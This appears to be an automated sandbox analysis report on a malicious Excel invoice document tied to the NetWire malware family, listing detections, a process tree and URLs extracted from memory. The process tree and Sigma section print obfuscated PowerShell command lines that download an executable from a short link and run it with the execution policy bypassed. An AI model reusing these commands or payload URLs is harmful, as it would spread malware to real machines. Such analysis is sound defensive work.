Loading ...

Play interactive tourEdit tour

Analysis Report Proforma Invoice.xls

Overview

General Information

Sample Name:Proforma Invoice.xls
Analysis ID:320373
MD5:55db711144ff4a35faf58d982e7cf727
SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
Tags:netwirexls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2452 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2564 cmdline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2880 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2532 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2724 cmdline: powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2372 cmdline: cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1980 cmdline: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2452, ProcessCommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), ProcessId: 2564

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://shopphongtinh.com/Ubnccbruoun7.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: Proforma Invoice.xlsVirustotal: Detection: 14%Perma Link
Source: Proforma Invoice.xlsReversingLabs: Detection: 20%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: global trafficDNS query: name: cutt.ly
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.22.1.232:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.22.1.232:443
Source: Joe Sandbox ViewIP Address: 202.92.6.10 202.92.6.10
Source: Joe Sandbox ViewIP Address: 104.22.1.232 104.22.1.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000007.00000002.2125152617.000000001B800000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000007.00000002.2125382538.000000001B8DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000007.00000002.2125382538.000000001B8DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
Source: powershell.exe, 00000007.00000002.2127591509.000000001D1CD000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windows
Source: powershell.exe, 00000007.00000002.2117256684.000000000034B000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2125516730.000000001B8F8000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D
Source: powershell.exe, 00000007.00000003.2111885324.000000001D137000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000007.00000002.2117820779.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2153355940.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2127649611.000000001D2F0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: http://status.rapidssl.com0
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000007.00000002.2117820779.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2153355940.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000007.00000003.2112254528.000000001D155000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000007.00000003.2112290528.000000001B8DE000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmpString found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000009.00000002.2152554964.00000000002CE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2164576131.000000000009E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000009.00000002.2152554964.00000000002CE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000007.00000003.2112254528.000000001D155000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000007.00000002.2127330228.000000001D0F0000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelin
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000007.00000003.2112206947.00000000003AE000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000007.00000002.2125152617.000000001B800000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: https://cutt.l
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly
Source: powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/ZhqUH1O
Source: powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/ZhqUH1OPE
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: https://shopphongtinh.com
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: https://shopphongtinh.com/Ubnccbruoun7.exe
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmpString found in binary or memory: https://shopphongtinh.comp
Source: powershell.exe, 00000007.00000002.2125516730.000000001B8F8000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000007.00000002.2125516730.000000001B8F8000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
